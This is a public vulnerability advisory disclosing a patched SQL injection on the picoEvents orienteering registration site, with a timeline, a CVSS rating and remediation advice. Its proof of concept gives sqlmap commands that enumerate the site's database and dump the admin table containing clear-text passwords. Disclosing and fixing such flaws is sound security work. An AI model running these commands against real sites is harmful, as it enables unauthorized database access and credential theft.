entry.picoevents.ch - SQL-Injection Vulnerability (#mvid6)
Document Title:
===============
entry.picoevents.ch - SQL-Injection Vulnerability
mosi Vulnerability ID (mvid):
===============
6
Discovery Status:
=============
Patched - Public Disclosure
CVSSv2 Overall Score:
===============
9.6
CVSSv2 Vector:
==============
(AV:N/AC:M/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C/CDP:MH/TD:H/CR:M/IR:M/AR:H)
https://nvd.nist.gov/vuln-metrics/cvss/v2-calculator?vector=(AV:N/AC:M/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C/CDP:MH/TD:H/CR:M/IR:M/AR:H)
Product & Service Introduction:
==============
picoEvents provides an online registration and live result service to simplify the timekeeping in orienteering combined with SPORTident.
http://picoevents.ch/
Abstract:
==============
Simon Monai found together with Timo Kübler and Namo Flury a SQL-injection vulnerability in the web form. It was abused to delete the competitions stored in the database on the webserver.
Report Timeline:
==============
2017-06-19: Analysis of server attack requested by vendor
2017-06-19: Vulnerability detected
2017-06-19: Vendor informed
2017-06-20: Vendor acknowledge
2017-06-20: Vendor applied workaround
2017-06-21: Patch provided by mosi security research
2017-06-21: Patch faulty
2017-06-26: New patch by mosi security research
2017-06-26: Patch approved by mosi security research
2017-06-27: Public Disclosure
Affected Products:
=============
entry.picoevents.ch - Multisport Registration Page
Exploitation Technique:
=============
SQL Injection
Security Level:
=============
Critical
Technical Details & Description:
=============
Request method (s):
[+] GET
Vulnerable Module(s):
[+] http://www.picoevents.ch/entry/multisport/weiche_msp.php?recordID=95
Proof of Concept (PoC):
=============
By running following commands in the shell of a Kali Linux installation, the administration account passwords can be gathered:
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 --dbs
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 -D picoEVENTS --tables
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 -D picoEVENTS -T admin --columns
sqlmap -u picoevents.ch/entry/regist/multisport/weiche_msp.php?recordID=95 -D picoEVENTS -T admin --dump
The results are alarming. The admin passwords are stored in clear text and allow the hacker to log into the administrator interface and perform changes.
Possible Solution:
============
Check the GET-vars against SQL injection parameters and hash the passwords. A WAF can help preventing further attacks.
Security Risk:
============
This vulnerability is rated critical and was already abused. (CVSSv2 9.6)
Author / Credits:
============
mosi security research - Simon Monai (http://jongliertricks.ch/kontakt)
Public Disclosure:
============
2017-06-27 - https://jongliertricks.ch/mosi-security-research/40
----------------------------
https://jongliertricks.ch/mosi-security-research